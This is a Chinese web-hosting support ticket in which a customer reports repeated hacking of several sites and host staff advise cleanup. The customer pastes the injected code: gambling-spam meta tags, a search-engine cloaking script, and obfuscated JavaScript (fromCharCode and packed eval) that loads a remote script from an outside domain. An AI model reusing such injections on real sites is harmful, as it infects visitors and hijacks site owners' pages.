問:安全組以開放所有端口ssh @127.0.0.1 一直超時,云服務127.0.0.1 ssh連不上
答:您好,查看您安全組中禁用了所有tcp連接,請核實。嘗試禁用安全組后正常
,非常感謝您長期對我司的支持!
問:www.gdyhiot.com 這個網站老是給賭博網站攻擊,是你們的服務器有問題嗎? 之前被攻擊,我們改了后臺路徑密碼,恢復后又被攻擊,我們把后臺代碼全刪掉了,今天還是給攻擊,是什么原因呢?服務器中毒了?
問:代碼里沒看到木馬文件
問:現在的頁面就是一個靜態頁面
問:www.wkwlk.com 這個網站也一樣
問:www.wkwlk.com 這個JS攻擊還在。
問:<title>310ⅴ大赢家比分,310ⅴ大赢家足球比分,大赢家足球直播即时比分90</title><meta name="" content="足球比分,大赢家比分,足球即时比分,比分直播,310比分网"/><meta name="" content="欢迎使用310bf即时比分系统【136359.com】如在使用过程中发现任何错误,可联系我们24小时报障...比分数据转载于各大门户网站、体育网、报刊,仅供购买中国体育足彩单场彩游戏"/><meta property="og:image" content="http://www.wkwlk.com/logo.png"/><>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="物聯卡|物聯網卡|物聯網卡平臺|物聯網卡解決方案-微科物聯網"}</script>< type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,101,102,104,102,117,104,49,46,99,111,109,47,51,54,53,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script><meta name="" content="物聯卡,物聯網卡,物聯網流量卡,物聯網解決方案,移動物聯卡,電信物聯卡,聯通物聯卡,電信物聯網卡,移動物聯網卡,聯通物聯網卡,移動nb卡,物聯網語音卡"><meta name="" content="【微科物聯網】致力于為企業智能設備提供全方位物聯網解決方案,提供物聯卡,物聯網卡,電信物聯卡,移動物聯卡,聯通物聯卡,物聯網流量卡,移動物聯網卡,電信物聯網卡,聯通物聯網卡,物聯網語音卡,消費級物聯網專用卡,移動nb卡,物聯網芯片模組等專業服務的首選物聯網公司。">攻擊代碼
問:
答:您好,
建議您暫時先參考http://www.shinetop.cn/faq/list.asp?unid=673 處理,并將站點設置為只讀。
如果再次出現掛馬的情況,請暫時不要調整并及時反饋本工單。
我們根據文件修改時間并根據日志來分析,找出后門并清理刪除。
非常感謝您對我司的支持,謝謝!
問: 應該是你們的服務器出現問題了吧,我的這個網站www.jdsjcn.com 又中招了,現在沒有改動,源碼標題都被改了
問:<meta charset="utf-8" /><title>湖北快三-首页</title><meta name="" content="湖北快三,湖北快三官网,湖北快三平台"/><meta name="" content="湖北快三官网【注册网址:578zq.com】(计划群加导师QQ:63796115)湖北快三平台,为您提供湖北快三精准计划,湖北快三开奖,湖北快三开奖结果,湖北快三走势图,湖北快三在线投注。"/><>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="中國酒店設計網(官網) – 全球最大中文酒店設計室內設計行業門戶網站"}</script>< type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w '};c=1;};while(c–)if(k[c])p=p.replace(new RegExp('\\\\b' e(c) '\\\\b','g'),k[c]); p;}('n["\\\\m\\\\b\\\\5\\\\k\\\\i\\\\2\\\\6\\\\0"]["\\\\d\\\\7\\\\1\\\\0\\\\2"](\\'\\\\f\\\\3\\\\5\\\\7\\\\1\\\\4\\\\0 \\\\0\\\\o\\\\4\\\\2\\\\e\\\\a\\\\0\\\\2\\\\j\\\\0\\\\8\\\\g\\\\9\\\\l\\\\9\\\\3\\\\5\\\\7\\\\1\\\\4\\\\0\\\\a \\\\3\\\\7\\\\5\\\\e\\\\a\\\\s\\\\0\\\\0\\\\4\\\\3\\\\t\\\\8\\\\8\\\\u\\\\9\\\\6\\\\d\\\\2\\\\6\\\\p\\\\b\\\\6\\\\q\\\\1\\\\6\\\\2\\\\h\\\\5\\\\b\\\\i\\\\8\\\\r\\\\1\\\\4\\\\9\\\\1\\\\h\\\\g\\\\3\\\\a\\\\c\\\\f\\\\8\\\\3\\\\5\\\\7\\\\1\\\\4\\\\0\\\\c\\');',31,31,'x74|x69|x65|x73|x70|x63|x6e|x72|x2f|x61|x22|x6f|x3e|x77|x3d|x3c|x6a|x2e|x6d|x78|x75|x76|x64|window|x79|x2d|x6c|x71|x68|x3a|x66'.split('|'),0,{}))</script><meta content="" name="" /><meta content="IE=EDGE,chrome=1" http-equiv="X-UA-Compatible" /><meta content="user-scalable=no, width=1200, initial-scale=1, maximum-scale=1.0" name="" /><meta content="" name="" /><meta content=" 中國酒店設計網(官網) – 全球最大中文酒店設計室內設計行業門戶網站" name="" /><meta content="中國酒店設計網(官網) – 全球最大中文酒店設計室內設計行業門戶網站" name="" /><link href="/meadin/pc/img/favicon.ico" rel="icon" type="image/icon" />
問:這個是帝國的,不是織夢, 也中招了,不看都不知道
答:您好,
虛擬主機管理–入侵檢測 會有根據特征碼檢查到異常代碼,請檢查\\www\\e\\\\1.php 這個文件是否正常 ,推薦聯系程序商或專業程序員協助核實 。若需我司協助排查掛馬屬于收費項目,請重新提交工單選擇:【虛擬主機/數據庫問題】—【網站類問題】—【網站掛馬/中毒/非法信息清理】 ,會產生費用,非常感謝您長期對我司的支持!
問:www.gdyhiot.com,www.wkwlk.com全中招了
問:暈,乘著假期大黑特黑了,
答:您好,這兩個站點是否是一套程序,這邊主要是提供空間服務的,兩個站點確實存在非法代碼,如圖:,建議聯系程序提供商核實并清理掛馬,
問:上次之后都把相關的PHP代碼都DEL掉了,還把屬性都改成只讀了,今天下午都正常,
問:就一個靜態站,都是只讀屬性都被攻擊,還說程序漏洞????
答:您好
問:這里面的DATA,INCLUDE,DEDE,所有的涉及PHP的代碼都DEL完了
答:您好,
掛馬原因是程序漏洞所致,日志中可以看到,木馬文件http://www.wkwlk.com/Solution_files/anfang.asp,這個文件10號就已經存在但沒有清理,請核實并處理后在重新生成首頁觀察,非常感謝您長期對我司的支持!
三五互聯(35.com)是經工信部、ICANN、CNNIC認證審批,持有ISP、云牌照、IDC、CDN、頂級域名注冊商等全業務資質的正規老牌服務商,自成立至今20余年專注于域名注冊、虛擬主機、云服務器、企業郵箱、企業建站等互聯網基礎服務!
截止目前,已經為超過2000萬個域名提供了注冊、解析等服務,是中國五星級域名注冊注冊商!已為超過50萬個網站提供了高速穩定的云托管服務,獲評中國最受用戶喜歡云主機服務商。
三五互聯提供全方位7X24H專業售后支撐,域名注冊特價1元起,高速穩定云主機45元起,更多詳情請瀏覽三五互聯官網:http://www.shinetop.cn/
